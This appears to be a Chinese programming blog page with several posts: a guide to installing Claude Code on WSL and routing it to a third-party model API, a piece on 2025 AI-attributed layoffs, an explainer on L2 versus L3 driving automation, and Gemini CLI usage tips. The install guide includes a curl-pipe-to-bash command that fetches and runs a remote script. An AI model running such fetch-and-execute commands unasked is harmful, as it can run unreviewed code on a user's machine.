编程笔记

Claude Code(1)在 WSL Ubuntu 上安装和配置指南

2026-03-19T16:00:00.000Z

本文介绍如何在 Windows Subsystem for Linux (WSL) Ubuntu 环境中安装和配置 Claude Code，以及如何使用第三方大模型 API。

前置要求

在开始之前，请确保您已准备好：

WSL Ubuntu - 已安装并配置好 WSL Ubuntu 环境
终端访问权限 - 打开 WSL 终端
代码项目 - 准备一个要处理的项目目录
API 访问权限 - 拥有 Claude 订阅或第三方 LLM API 密钥

安装 Claude Code

这是最简单的安装方式，支持自动后台更新：

1	curl -fsSL https://claude.ai/install.sh \| bash

安装完成后，claude 命令将被添加到系统 PATH 中。

有npm的话也可以这样安装

1	npm install -g @anthropic-ai/claude-code

验证安装

安装完成后，验证安装是否成功：

1	claude --version

配置

使用 Claude 订阅登录

首次启动 Claude Code 时，需要登录账户：

1 2	claude # 首次使用时会提示登录

支持的账户类型：

Claude Pro/Max/Teams/Enterprise（推荐）
Claude Console（使用 API 预付费额度）
企业云提供商：Amazon Bedrock、Google Vertex AI、Microsoft Foundry

登录后，凭据将保存在系统中，无需重复登录。如需切换账户，使用 /login 命令。

跳过登录（使用第三方 API）

如果您只想使用第三方 LLM API 而不登录 Claude 账户，需要配置环境变量（见下文）。

使用第三方 LLM API

在~/.claude/settings.json (命令行下使用claude code) 中配置
在vscode安装claude code插件,点击插件配置会在vscode配置文件中配置

命令行

{
 "theme":"light",
 "env":{
    "ANTHROPIC_API_KEY":"sk--你的api key",
    "ANTHROPIC_BASE_URL":"https://api.qnaigc.com",
    "ANTHROPIC_DEFAULT_HAIKU_MODEL": "z-ai/glm-4.5",
    "ANTHROPIC_DEFAULT_SONNET_MODEL": "z-ai/glm-4.6",
    "ANTHROPIC_DEFAULT_OPUS_MODEL": "z-ai/glm-5",
    "ANTHROPIC_MODEL": "z-ai/glm-4.5",
    "CLAUDE_CODE_DISABLE_NONESSENTIAL_TRAFFIC": "1",
    "API_TIMEOUT_MS": "3000000"
 },
 "hasCompletedOnboarding": true
}

ANTHROPIC_BASE_URL,第三方大模型api 地址,我这里使用七牛云的,点击注册免费获取1000万token
hasCompletedOnboarding 必须配置,不然一直提示需要claude code账户
ANTHROPIC_DEFAULT_HAIKU_MODEL,简单快速任务指定模型
ANTHROPIC_DEFAULT_SONNET_MODEL,日常编码任务模型
ANTHROPIC_DEFAULT_OPUS_MODEL,复杂推理任务模型
ANTHROPIC_MODEL,默认模型

vscode中claude code 插件配置

找不到配置文件位置,请点击claude code插件的Settings(设置)按钮

"claudeCode.environmentVariables": [
    {"name":"ANTHROPIC_API_KEY","value": "sk-你的api key"},
    {"name":"ANTHROPIC_BASE_URL","value": "https://api.qnaigc.com"},
    {"name":"ANTHROPIC_DEFAULT_HAIKU_MODEL","value": "z-ai/glm-4.5"},
    {"name":"ANTHROPIC_DEFAULT_SONNET_MODEL","value": "z-ai/glm-4.7"},
    {"name":"ANTHROPIC_DEFAULT_OPUS_MODEL","value": "z-ai/glm-5"},
    {"name":"ANTHROPIC_MODEL","value": "z-ai/glm-4.6"},
],
"claudeCode.disableLoginPrompt": true,
"claudeCode.hideOnboarding": true

在插件中,使用 claudeCode.disableLoginPrompt,禁用插件的登录提示,开启后配置了第三方api就不会提示你登录claude code账户

常用命令

命令	说明	示例
`claude`	启动交互模式	`claude`
`claude "任务"`	执行一次性任务	`claude "修复构建错误"`
`claude -p "查询"`	执行单次查询后退出	`claude -p "解释这个函数"`
`claude -c`	继续当前目录最近对话	`claude -c`
`claude -r`	恢复之前的对话	`claude -r`
`/clear`	清除对话历史	`/clear`
`/help`	显示可用命令	`/help`
`exit` 或 Ctrl+C	退出 Claude Code	`exit`

获取帮助

(译)AI 裁员潮：亚马逊、微软等科技巨头将 2025 年裁员归因于人工智能

2025-12-23T16:00:00.000Z

[导读] 随着 2025 年的临近，科技行业的裁员潮并未平息。与往年不同的是，今年的裁员逻辑发生了根本性转变：企业不再仅仅是因为宏观经济压力，而是为了腾出资金和岗位，全力冲刺人工智能（AI）领域。据咨询公司 Challenger， Gray & Christmas 称，今年美国 AI 导致了近 55,000 人裁员。

资源重组：从传统业务转向 AI

包括亚马逊（Amazon）、微软（Microsoft）和谷歌母公司 Alphabet 在内的科技巨头在最新的财报和内部备忘录中明确表示，2025 年的裁员计划与公司的 AI 长期战略紧密相连。

亚马逊：优化云计算与 Alexa 部门

去年十月，亚马逊宣布了其历史上最大规模的裁员，裁减了 14000 个企业岗位，旨在投资其“最大赌注”，其中包括人工智能。

亚马逊最近宣布将在其 AWS（云计算）部门和 Alexa 硬件部门进行新一轮裁员。公司发言人表示：“我们正在不断审视业务，以确保投资与客户需求相匹配。在某些领域，我们正在缩减规模，以便将资源重新投入到支撑未来增长的生成式 AI 项目中。”

微软：投资 OpenAI 后的结构调整

Microsoft 截至 2025 年已裁减约 15,000 个岗位，最近一次 7 月的公告中，有 9,000 个职位被裁员。

微软尽管在 AI 领域处于领先地位，但其首席执行官萨提亚·纳德拉（Satya Nadella）强调了“财务纪律”的重要性。微软在 2025 年的裁员主要集中在非核心软件业务和部分硬件部门。公司表示，通过减少这些领域的开支，微软可以每年额外投入数十亿美元用于扩建 AI 数据中心和购买昂贵的 Nvidia 芯片。

IBM: AI替代

全球科技巨头 IBM 首席执行官阿尔文德·克里希纳（Arvind Krishna）今年五月告诉《华尔街日报》，人工智能聊天机器人已经取代了几百名人力资源员工的工作岗位。
然而，与其他在裁员中引用人工智能的公司不同，Krishna 承认公司在其他需要更多批判性思维的领域增加了招聘，如软件工程、销售和市场营销。
去年 11 月，公司宣布全球裁员 1%，这可能影响近 3000 名员工。

2025 年裁员的核心特征

根据 CNBC 的分析，2025 年的裁员呈现出以下三个显著特点：

“瘦身”与“招聘”并行：虽然公司在裁减传统程序员、营销人员和管理岗位，但他们同时也在以极高的薪酬争抢机器学习工程师和 AI 研究员。
效率为王：Meta 首席执行官马克·扎克伯格（Mark Zuckerberg）提出的“效率之年”概念在 2025 年得到了延续。AI 自动化工具正开始取代公司内部的一些重复性行政和初级编码工作。
长期估值压力：华尔街投资者现在不仅关注公司的收入增长，更关注公司如何利用 AI 提高利润率。裁减冗余人员被视为提高人效比的关键手段。

“这不再是关于‘生存在下行周期’，而是关于‘在 AI 时代保持竞争力’。” 投行 Jefferies 的分析师在报告中指出，“如果你不裁掉那些不增长的部分来喂养 AI 这头‘巨兽’，你就会掉队。”

员工的焦虑与技能重塑

裁员消息对硅谷和全球科技社区产生了冲击。根据就业调查显示，超过 60% 的科技从业者表示担心自己的岗位会被 AI 取代。

专家建议，职场人士应关注以下领域的技能提升：

提示词工程（Prompt Engineering）
AI 模型调优与部署
复杂问题的系统架构设计（这是目前 AI 尚难完全替代的领域）

结论

2025 年的裁员潮标志着科技行业的一个新纪元。正如 2000 年代初的互联网转型一样，阵痛是巨大的，但它预示着一个以人工智能为核心的全新产业结构的诞生。对于亚马逊、微软等巨头而言，裁员不是结束，而是资源重新分配的开始。

原文&参考

https://www.cnbc.com/2025/12/21/ai-job-cuts-amazon-microsoft-and-more-cite-ai-for-2025-layoffs.html
据咨询公司 Challenger， Gray & Christmas 称，今年美国 AI 导致了近 55,000 人裁员: https://www.cnbc.com/2025/12/04/layoff-announcements-this-year-top-1point1-million-the-most-since-2020-when-pandemic-hit-challenger-says.html

AI|L2和L3级自动驾驶有什么区别

2025-12-15T16:00:00.000Z

L2和L3级自动驾驶有什么区别:

1. L2级别：你是“主驾驶”，它是“好助手”

通俗定义： 组合辅助驾驶。
状态： 你的手可以短暂离开（或者轻扶），但你的眼睛和大脑必须时刻盯着路况。
谁在开车： 本质上还是你在开车。车只是在帮你控制油门、刹车和方向盘（比如自动跟车、保持在车道中间）。
关键点： 如果前方突然出现个障碍物，车没识别出来，撞上了，责任全是你的。你不能玩手机，不能看电影。
目前市面情况： 特斯拉的AP、各种造车新势力的“领航辅助（NOA/NGP）”，绝大多数都属于L2（或者叫L2.5、L2.9）。

2. L3级别：它是“临时司机”，你是“监考官”

通俗定义： 有条件的自动驾驶。
状态： 在特定条件下（比如高速公路、堵车路段），你的眼睛和手可以离开路面。你可以刷短视频、发邮件，甚至吃个泡面。
谁在开车： 这个阶段，车才是司机。它承诺在这些特定情况下能搞定一切。
关键点： 如果在系统运行期间，车自己撞了，责任通常由汽车厂家承担。但是，你不能睡觉，因为当系统遇到搞不定的情况（比如修路、暴雨），它会疯狂尖叫提醒你，你必须在几秒钟内接管。
目前市面情况： 极少。奔驰、宝马的部分车型在德国等地区拿到了牌照，国内正在逐步开放试点。

四个维度的核心区别：

维度	L2 级（辅助驾驶）	L3 级（自动驾驶）
责任人	始终是你	系统负责（在它工作时）
注意力	必须时刻盯着路	可以分心（看书、玩手机）
双手	必须随时准备接管	可以脱离，但接到指令需接管
分水岭意义	人是主体，机器是工具	机器是主体，人是后备

总结：

L2 就像是一个刚拿驾照的新手坐在驾驶位： 你坐在副驾驶，手得扶着方向盘，眼得盯着前方的坑，随时准备帮他踩刹车。他是帮你省力的，但你心里的弦得崩着。
L3 就像是你雇了一个司机： 你可以坐在驾驶位上处理工作，不用看路。但这个司机比较胆小，他遇到解决不了的难题会大喊“老板快来拉一把”，这时候你得立刻扔掉手机接管。

一句话总结：L2是“省力不省心”，L3是“既省力又省心（但不能睡觉）”。

AI|Gemini CLI 实用技巧与窍门

2025-12-15T16:00:00.000Z

本指南涵盖约30个有效使用 Gemini CLI 进行智能编码的专业技巧

Gemini CLI 是一个开源 AI 助手，将 Google Gemini 模型的强大功能直接带入您的终端。它作为一个对话式的”智能”命令行工具运行——意味着它可以理解您的请求，选择工具（如运行 shell 命令或编辑文件），并执行多步骤计划来协助您的开发工作流程。

实际上，Gemini CLI 就像一个超级强化的编程伙伴和命令行助手。它在编码任务、调试、内容生成甚至系统自动化方面表现出色，全部通过自然语言提示完成。在深入探讨专业技巧之前，让我们快速回顾一下如何设置 Gemini CLI 并开始使用。

入门指南

安装： 您可以通过 npm 安装 Gemini CLI。全局安装请使用：

1	npm install -g @google/gemini-cli

或者使用 npx 无需安装直接运行：

1	npx @google/gemini-cli

Gemini CLI 在所有主要平台上都可用（使用 Node.js/TypeScript 构建）。安装完成后，只需在终端中运行 gemini 命令即可启动交互式 CLI。

身份验证： 首次使用时，您需要通过 Gemini 服务进行身份验证。您有两个选择：(1) Google 账户登录（免费层） - 这让您免费使用 Gemini 2.5 Pro，享有慷慨的使用限制（约每分钟 60 次请求和每天 1,000 次请求）。启动时，Gemini CLI 会提示您使用 Google 账户登录（无需账单信息）。(2) API 密钥（付费或更高级别访问） - 您可以从 Google AI Studio 获取 API 密钥，并设置环境变量 GEMINI_API_KEY 来使用它。

使用 API 密钥可以提供更高的配额和企业数据使用保护；付费使用中的提示不会用于训练，但日志可能会为安全目的而保留。

例如，在您的 shell 配置文件中添加：

1	export GEMINI_API_KEY="YOUR_KEY_HERE"

基本用法： 启动交互式会话，只需运行不带参数的 gemini。您会看到一个 gemini> 提示符，可以在其中输入请求或命令。例如：

1 2	$ gemini gemini> Create a React recipe management app using SQLite

然后您可以观看 Gemini CLI 创建文件、安装依赖、运行测试等，以满足您的请求。如果您偏好一次性调用（非交互式），使用带有提示的 -p 标志，例如：

1	gemini -p "Summarize the main points of the attached file. @./report.txt"

这将输出单个响应并退出。您也可以将输入传递给 Gemini CLI：例如，echo "Count to 10" | gemini 会通过标准输入提供提示。

CLI 界面： Gemini CLI 提供丰富的类似 REPL 的界面。它支持斜杠命令（以 / 为前缀的特殊命令，用于控制会话、工具和设置）和感叹号命令（以 ! 为前缀，直接执行 shell 命令）。我们将在下面的专业技巧中介绍其中的许多命令。默认情况下，Gemini CLI 在安全模式下运行，任何修改系统的操作（写入文件、运行 shell 命令等）都会要求确认。当提出工具操作时，您会看到差异或命令，并被提示（Y/n）批准或拒绝它。这确保 AI 不会在未经您同意的情况下进行不必要的更改。

了解了基础知识后，让我们探索一系列专业技巧和隐藏功能，帮助您充分利用 Gemini CLI。每个技巧首先提供一个简单的示例，然后是更深入的细节和细微差别。这些技巧融合了工具创建者（如 Taylor Mullen）和 Google 开发者关系团队的建议，以及更广泛社区的见解，旨在成为 Gemini CLI 高级用户的权威指南。

技巧1：使用 `GEMINI.md` 实现持久化上下文

快速使用场景： 无需在提示词中重复写提示词。通过创建 GEMINI.md 文件提供项目特定的上下文或指令，这样 AI 始终具有重要的背景知识，无需每次都被告知。

在处理项目时，您通常有一些总体细节——例如编码风格指南、项目架构或重要事实——希望 AI 记住。Gemini CLI 允许您将这些信息编码到一个或多个 GEMINI.md 文件中。只需在项目中创建 .gemini 文件夹（如果尚不存在），并添加名为 GEMINI.md 的 Markdown 文件，其中包含您希望 AI 持久保存的任何注释或指令。例如：

# Phoenix 项目 - AI 助手
# - All Python code must follow PEP 8 style.  
# - Use 4 spaces for indentation.  
# - The user is building a data pipeline; prefer functional programming paradigms.
- 所有 Python 代码必须遵循 PEP 8 风格。
- 使用 4 个空格进行缩进。
- 用户正在构建数据管道；优先考虑函数式编程范式。

将此文件放在您的项目根目录（或子目录中，以获得更细粒度的上下文）。现在，每当您在该项目中运行 gemini 时，它都会自动将这些指令加载到上下文中。这意味着模型将始终准备好这些指令，避免需要在每个提示前添加相同的指导。

工作原理： Gemini CLI 使用分层上下文加载系统。它将全局上下文（来自 ~/.gemini/GEMINI.md，您可用于跨项目默认值）与您的项目特定的 GEMINI.md 甚至子文件夹中的上下文文件结合起来。更具体的文件会覆盖更通用的文件。您可以随时使用以下命令检查加载了什么上下文：

1	/memory show

这将显示 AI 看到的完整组合上下文。如果您更改了 GEMINI.md，使用 /memory refresh 重新加载上下文而无需重新启动会话。

提示： 使用 /init 斜杠命令快速生成初始的 GEMINI.md。在新项目中运行 /init 会创建一个模板上下文文件，包含检测到的技术栈、项目摘要等信息。然后您可以编辑和扩展该文件。对于大型项目，考虑将上下文分解为多个文件，并使用 @include 语法将它们导入到 GEMINI.md 中。例如，您的主 GEMINI.md 可以包含类似 @./docs/prompt-guidelines.md 的行来引入额外的上下文文件。这使您的指令保持组织有序。

通过精心制作的 GEMINI.md，您实际上为 Gemini CLI 提供了项目需求和约定的”记忆”。这种持久化上下文会带来更相关的响应，减少来回的提示工程。

技巧2：创建自定义斜杠命令

快速使用场景： 通过定义自己的斜杠命令来加速重复性任务。例如，您可以创建一个命令 /test:gen 从描述生成单元测试，或者 /db:reset 来删除并重新创建测试数据库。这通过针对您的工作流程定制的单行扩展了 Gemini CLI 的功能。

Gemini CLI 支持自定义斜杠命令，您可以在简单的配置文件中定义它们。在底层，这些本质上都是预定义的提示模板。要创建一个，在 ~/.gemini/ 下创建 commands/ 目录用于全局命令，或在您项目的 .gemini/ 文件夹中用于项目特定命令。在 commands/ 内部，为每个新命令创建一个 TOML 文件。文件名格式决定了命令名称：例如文件 test/gen.toml 定义了命令 /test:gen。

让我们通过一个示例。假设您想要一个命令来根据需求描述生成单元测试。您可以创建 ~/.gemini/commands/test/gen.toml，内容如下：

# 调用方式：/test:gen "测试描述"
description = "根据需求生成单元测试"
prompt = """
您是专业的测试工程师。基于以下需求，请使用 Jest 框架编写一个全面的单元测试。

需求：{{args}}
"""

现在，重新加载或重启 Gemini CLI 后，您可以简单地输入：

1	/test:gen "确保登录按钮在成功后重定向到仪表板"

Gemini CLI 会识别 /test:gen 并用提供的参数替换提示模板中的 {{args}}（在本例中是需求）。然后 AI 将相应地生成 Jest 单元测试。description 字段是可选的，但在您运行 /help 或 /tools 列出可用命令时使用。

这个机制极其强大——实际上，您可以用自然语言为 AI 编写脚本。社区创建了许多有用的自定义命令。例如，Google 的 DevRel 团队分享了数十个实用工作流程命令（通过开源仓库），以展示了如何为常见流程编写脚本，如创建 API 文档、清理数据或构建模板代码。通过定义自定义命令，您可以将复杂的提示（或一系列提示）打包成可重用的快捷方式。

提示： 自定义命令也可用于强制格式化或为某些任务为 AI 应用”角色”。例如，您可能有一个 /review:security 命令，总是在提示前加上”您是安全审计员…”来审查代码漏洞。这种方法确保 AI 在处理特定类别任务时的响应一致性。

要与团队共享命令，您可以将 TOML 文件提交到您项目的仓库中（在 .gemini/commands 目录下）。拥有 Gemini CLI 的团队成员在项目中工作时会自动获取这些命令。这是在团队中标准化 AI 辅助工作流程的好方法。

技巧3：使用自己的 `MCP` 服务器扩展 Gemini

快速使用场景： 假设您希望 Gemini 与外部系统或未内置的自定义工具交互——例如，查询专有数据库或与 Figma 设计集成。您可以通过运行自定义模型上下文协议 (MCP) 服务器并将其插入 Gemini CLI 来实现这一点。

Gemini CLI 开箱即用地提供了几个 MCP 服务器（例如，支持 Google 搜索、代码执行沙箱等），您也可以添加自己的MCP服务器。MCP 服务器本质上是一个外部进程（可以是本地脚本、微服务甚至云端点），使用简单的协议来处理 Gemini 的任务。这种架构极大提升了 Gemini CLI 的可扩展性。

MCP 服务器示例： 一些社区和 Google 提供的 MCP 集成包括Figma MCP（从 Figma 获取设计细节）、剪贴板 MCP（读取/写入系统剪贴板）等。实际上，在内部演示中，Gemini CLI 团队展示了一个”Google Docs MCP”服务器，允许直接将内容保存到 Google Docs。即，每当 Gemini 需要执行内置工具无法处理的操作时，它可以委托给您的 MCP 服务器。

如何添加一个MCP服务器： 您可以通过 settings.json 或使用 CLI 配置 MCP 服务器。对于快速设置，尝试 CLI 命令：

1	gemini mcp add myserver --command "python3 my_mcp_server.py" --port 8080

这会注册一个名为”myserver”的服务器，Gemini CLI 将通过运行给定命令（这里是一个 Python 模块）在端口 8080 上启动它。在 ~/.gemini/settings.json 中，它会在 mcpServers 下添加一个条目。例如：

"mcpServers": {
  "myserver": {
    "command": "python3",
    "args": ["-m", "my_mcp_server", "--port", "8080"],
    "cwd": "./mcp_tools/python",
    "timeout": 15000
  }
}

此配置告诉 Gemini 如何启动 MCP 服务器及其位置。一旦运行，该服务器提供的工具就可被 Gemini CLI 使用。您可以使用斜杠命令列出所有 MCP 服务器及其工具：

/mcp

这将显示任何注册的服务器及其暴露的工具名称。

MCP 的强大之处： MCP 服务器可以提供丰富的多模态结果。例如，通过 MCP 提供的工具可以返回图像或格式化表格作为 Gemini CLI 响应的一部分。它们还支持 OAuth 2.0，因此您可以安全地连接到 API（如 Google 的 API、GitHub 等），而无需暴露凭据。本质上，如果您能编写它，就可以将其包装为 MCP 工具——将 Gemini CLI 变成协调许多服务的中心。

默认与自定义： 默认情况下，Gemini CLI 的内置工具涵盖了很多功能（读取文件、网络搜索、执行 shell 命令等），但 MCP 让您能够更进一步。一些高级用户创建了 MCP 服务器来与内部系统交互或执行专门的数据处理。例如，您可以有一个 database-mcp 提供 /query_db 工具用于在公司数据库上运行 SQL 查询，或一个 jira-mcp 通过自然语言创建工单。

创建自己的MCP服务器时，请注意安全性：默认情况下，自定义 MCP 工具需要确认，除非您将它们标记为受信任。您可以通过设置（如服务器的 trust: true 以自动批准其工具操作）或通过将特定的安全工具列入白名单、将危险工具列入黑名单来控制安全性。

简而言之，MCP 服务器解锁了无限的集成可能性。MCP是专业功能，让 Gemini CLI 成为您的 AI 助手与您需要它与之工作的任何系统之间的粘合剂。如果您有兴趣构建一个，请查看官方 MCP 指南和社区示例。

技巧4：利用记忆添加与召回

快速使用场景： 通过将重要事实添加到 AI 的长期记忆中来保持它们触手可及。例如，在弄清楚数据库端口或 API 令牌后，您可以执行：

1	/memory add "我们的预发布 RabbitMQ 在端口 5673 上"

这将存储该事实，以便您（或 AI）以后不会忘记。

/memory 命令提供了简单但强大的持久化记忆机制。当您使用 /memory add 时，给定的文本会附加到您项目的全局上下文中（从技术上说，它会被保存到全局 ~/.gemini/GEMINI.md 文件或项目的 GEMINI.md 中）。这有点像做笔记并将其固定到 AI 的虚拟公告板上。一旦添加，AI 将在未来的交互中始终在提示上下文中看到该笔记，跨会话有效。

考虑一个例子：您在调试问题时发现了一个不明显的见解（”配置标志 X_ENABLE 必须设置为 true，否则服务启动失败”）。如果将此添加到记忆中，后来如果您的 AI 正在讨论相关问题，它不会忽略这个关键细节——它在上下文中。

使用 /memory：

/memory add "" - 向记忆添加事实或注释（持久化上下文）。这会立即使用新条目更新 GEMINI.md。
/memory show - 显示记忆的完整内容（即当前加载的组合上下文文件）。
/memory refresh - 从磁盘重新加载上下文（如果您在 Gemini CLI 外部手动编辑了 GEMINI.md 文件，或者多个人在协作编辑它，这很有用）。

因为记忆以 Markdown 存储，您也可以手动编辑 GEMINI.md 文件来策划或组织信息。/memory 命令是为了对话中的便利而存在，这样您就不必打开编辑器。

提示： 此功能非常适合”决策日志”。如果您在聊天期间确定了一种方法或规则（例如，使用某个特定库或约定的代码风格），将其添加到记忆中。然后 AI 会回忆起该决定并在以后避免与之矛盾。它对于可能跨越数小时或数天的长会话特别有用——通过保存关键点，您可以减少模型在对话变长时忘记早期上下文的倾向。

另一个用途是个人笔记。因为 ~/.gemini/GEMINI.md（全局记忆）为所有会话加载，您可以在其中放置一般偏好或信息。例如，”用户姓名是 Alice。请礼貌说话，避免俚语。”这就像配置 AI 的角色或全局知识。但请注意，全局记忆适用于所有项目，所以不要用项目特定信息使其杂乱。

总之，记忆添加与召回帮助 Gemini CLI 维护状态。将其视为随项目增长的知识库。使用它来避免重复自己，或提醒 AI 一些事实,否则它需要从头重新探索。

技巧5：使用检查点机制和 `/restore` 作为撤销按钮

快速使用场景： 如果 Gemini CLI 对您的文件进行了一系列您不满意的更改，您可以立即回滚到先前的状态。在启动 Gemini 时（或在设置中）启用检查点机制，并使用 /restore 命令像轻量级 Git 撤销一样撤销更改。

Gemini CLI 的检查点机制功能充当安全网。启用后，CLI 在每次修改文件的工具执行之前对项目文件进行快照。如果出现问题，您可以恢复到最后已知的良好状态。这本质上是 AI 操作的版本控制，无需您每次都手动提交到 Git。

如何使用它： 您可以通过使用 --checkpointing 标志启动 CLI 来启用检查点机制：

1	gemini --checkpointing

或者，您可以通过添加到配置中使其成为默认设置（在 settings.json 中添加 "checkpointing": { "enabled": true }）。激活后，您会注意到每次 Gemini 即将写入文件时，它会显示类似”检查点已保存”的内容。

如果您随后发现 AI 制作的编辑有问题，您有两个选择：

运行 /restore list（或仅运行不带参数的 /restore）查看带有时间戳和描述的最近检查点列表。
运行 /restore 回滚到特定检查点。如果省略 id 且只有一个待处理的检查点，它将默认恢复该检查点。

例如：

/restore

Gemini CLI 可能输出：

0: [2025-09-22 10:30:15] 运行 ‘apply_patch’ 之前
1: [2025-09-22 10:45:02] 运行 ‘write_file’ 之前

然后您可以执行 /restore 0 将所有文件更改（甚至对话上下文）恢复到该检查点时的状态。通过这种方式，您可以”撤销”错误的代码重构或 Gemini 进行的任何其他更改。

被恢复的内容： 检查点捕获您工作目录的状态（Gemini CLI 允许修改的所有文件）和工作空间文件（对话上下文也可能根据检查点捕获方式回滚）。恢复时，它会覆盖文件到旧版本并将对话内存重置到该快照。这就像将 AI 代理时间旅行回它犯错之前。请注意，它不会撤消外部数据（例如，如果 AI 运行了数据库迁移，它无法撤消该操作），但文件系统中的任何内容和聊天上下文会。

最佳实践： 对于一般任务，最好保持检查点机制开启。开销很小，并提供安心感。如果您发现不需要检查点（一切都顺利进行），您可以随时清除它或让下一个覆盖它。开发团队建议在多步骤代码编辑之前特别使用检查点机制。但对于关键任务项目，您仍应使用适当的版本控制（git）作为主要安全网——将检查点视为快速撤销的便利，而不是完整的 VCS。

本质上，/restore 让您有信心地使用 Gemini CLI。您可以让 AI 尝试大胆的更改，知道您有一个”天哪”按钮可以在需要时随时回档。

技巧6：读取 Google Docs、Sheets 等文件。配置了 Workspace MCP 服务器后，您可以粘贴 Docs/Sheets 链接，MCP 将获取其内容（需要权限）

快速使用场景： 想象您有一个包含某些规则或数据的 Google Doc 或 Sheet，希望 AI 使用。您无需复制粘贴内容，只需提供链接，配置了 Workspace MCP 服务器的 Gemini CLI 就可以获取并读取它。

例如：

1	Summarize the requirements from this design doc: https://docs.google.com/document/d/<id>

Gemini 可以提取该文档的内容并将其合并到其响应中。类似地，它可以通过链接读取 Google Sheets 或 Drive 文件。

工作原理： 这些功能通常通过MCP 集成启用。Google 的 Gemini CLI 团队已经构建（或正在开发）Google Workspace 的连接器。一种方法是运行一个小型 MCP 服务器，使用 Google 的 API（Docs API、Sheets API 等）在给定 URL 或 ID 时检索文档内容。配置后，您可能有斜杠命令或工具如 /read_google_doc，或者仅仅是自动检测看到 Google Docs 链接并调用相应工具来获取它。

例如，在 Agent Factory 播客演示中，团队使用了一个Google Docs MCP 将摘要直接保存到文档中——这意味着它首先也可以读取文档内容。实际上，您可能执行类似以下操作：

1	@https://docs.google.com/document/d/XYZ12345

使用 @ 包含 URL（上下文引用语法）向 Gemini CLI 发出信号获取该资源。有了 Google Doc 集成，该文档的内容将被拉取，就好像它是本地文件一样。从那里，AI 可以对其进行摘要、回答相关问题或以其他方式在对话中使用它。

类似地，如果您粘贴 Google Drive文件链接，正确配置的 Drive 工具可以下载或打开该文件（假设权限和 API 访问已设置）。Google Sheets 可以通过运行查询或读取单元格范围的 MCP 提供，使您能够询问诸如”这个 Sheet [链接] 中预算列的总和是多少？”之类的问题，并让 AI 计算它。

设置： 在撰写本文时，Google Workspace 集成可能需要一些调整（获取 API 凭据、运行 MCP 服务器等）。请关注官方 Gemini CLI 存储库和社区论坛以获取即用型扩展——例如，官方的 Google Docs MCP 可能作为插件/扩展提供。如果您感兴趣，可以按照指南在 MCP 服务器中使用 Google API 编写一个。这通常涉及处理 OAuth（Gemini CLI 为 MCP 服务器支持）然后暴露如 read_google_doc 等工具。

使用提示： 当您拥有这些工具时，使用它们可以像在提示中提供链接一样简单（AI 可能会自动调用工具来获取它）或使用斜杠命令如 /doc open 。检查 /tools 查看可用的命令——Gemini CLI 在那里列出所有工具和自定义命令。

总之，Gemini CLI 可以超越您的本地文件系统。无论是 Google Docs、Sheets、Drive 还是其他外部内容，您都可以通过引用拉取数据。这个专业技巧节省了您手动复制粘贴的时间，并保持上下文流程自然——只需引用您需要的文档或数据集，让 AI 抓取所需的内容。它使 Gemini CLI 成为您有权访问的所有信息的真正知识助手，而不仅仅是磁盘上的文件。

（注意：访问私人文档当然需要 CLI 拥有适当的权限。始终确保任何集成都尊重安全性和隐私。在公司环境中，设置此类集成可能涉及额外的身份验证步骤。）

技巧7：使用 `@` 引用文件和图像以提供明确的上下文

快速使用场景： 不要口头描述文件内容或图像，只需直接将 Gemini CLI 指向它。使用 @ 语法，您可以将文件、目录或图像附加到提示中。这保证 AI 精确地看到这些文件中的内容作为上下文。例如：

1	Explain this code to me: @./src/main.js

这将在提示中包含 src/main.js 的内容（在 Gemini 的上下文大小限制内），因此 AI 可以读取并解释它。

这个 @ 文件引用是 Gemini CLI 对开发者最强大的功能之一。它消除了歧义——您不是要求模型依赖记忆或猜测文件内容，您确实将文件交给它读取。您可以将此用于源代码、文本文档、日志等。类似地，您可以引用整个目录：

1	Refactor the code in @./utils/ to use async/await.

通过附加以斜杠结尾的路径，Gemini CLI 将递归地包含该目录中的文件（在合理范围内，尊重忽略文件和大小限制）。这对于多文件重构或分析非常有用，因为 AI 可以一起考虑所有相关模块。

更令人印象深刻的是，您可以在提示中引用二进制文件如图像。Gemini CLI（使用 Gemini 模型的多模态能力）可以理解图像。例如：

1	Describe what you see in this screenshot: @./design/mockup.png

图像将被输入到模型中，AI 可能会回应类似”这是一个登录页面，有蓝色登录按钮和头部图像”等。您可以想象各种用途：审查 UI 模型、整理照片（如我们将在后面的技巧中看到的），或从图像中提取文本（Gemini 也可以进行 OCR）。

关于有效使用 @ 引用的几个注意事项：

文件限制： Gemini 2.5 Pro 拥有巨大的上下文窗口（最多 100 万个token），所以您可以包含相当大的文件或许多文件。但是，非常大的文件可能会被截断。如果文件巨大（例如数十万行），请考虑对其进行摘要或分解成多个部分。如果引用过大或由于大小而跳过了某些内容，Gemini CLI 会警告您。
自动忽略： 默认情况下，Gemini CLI 在拉取目录上下文时尊重您的 .gitignore 和 .geminiignore 文件。因此，如果您 @./ 项目根目录，它不会将巨大的忽略文件夹（如 node_modules）倾倒到提示中。您可以使用 .geminiignore 自定义忽略模式，类似于 .gitignore 的工作方式。
显式与隐式上下文： Taylor Mullen（Gemini CLI 的创造者）强调使用 @ 进行显式上下文注入，而不是依赖模型的记忆或自己总结事情。它更精确，确保 AI 不会产生幻觉内容。尽可能，使用 @ 引用将 AI 指向真实来源（代码、配置文件、文档）。这种做法可以显著提高准确性。
链式引用： 您可以在一个提示中包含多个文件，如：

1	Compare @./foo.py and @./bar.py and tell me differences.

CLI 将包含两个文件。只需注意令牌限制；多个大文件可能会消耗大量上下文窗口。

使用 @ 本质上是您动态向 Gemini CLI 输送知识的方式。它将 CLI 变成可以处理文本和图像的多模态阅读器。作为专业用户，养成利用这个功能的习惯——它通常比要求 AI 执行诸如”打开文件 X 并执行 Y”之类的操作更快、更可靠（它可能或可能不会自行执行）。相反，您明确地给它 X 来处理。

技巧8：即时工具创建（让 Gemini 构建辅助工具）

快速使用场景： 如果手头的任务会受益于小型脚本或实用程序，您可以要求 Gemini CLI 在您的会话中为您创建该工具。例如，您可能会说，”编写一个 Python 脚本来解析此文件夹中的所有 JSON 文件并提取错误字段。” Gemini 可以生成脚本，然后您可以通过 CLI 执行它。本质上，您可以动态扩展工具集。

Gemini CLI 不会局限于其预先存在的工具；它可以使用其编码能力在需要时制造新工具。这通常隐式发生：如果您要求复杂的东西，AI 可能建议编写临时文件（包含代码），然后运行它。作为用户，您也可以明确地指导这个过程：

创建脚本： 您可以写提示词让 Gemini 创建您选择语言的脚本或程序。它可能会使用 write_file 工具来创建文件。例如：

1	Generate a Node.js script that reads all '.log' files in the current directory and reports the number of lines in each.

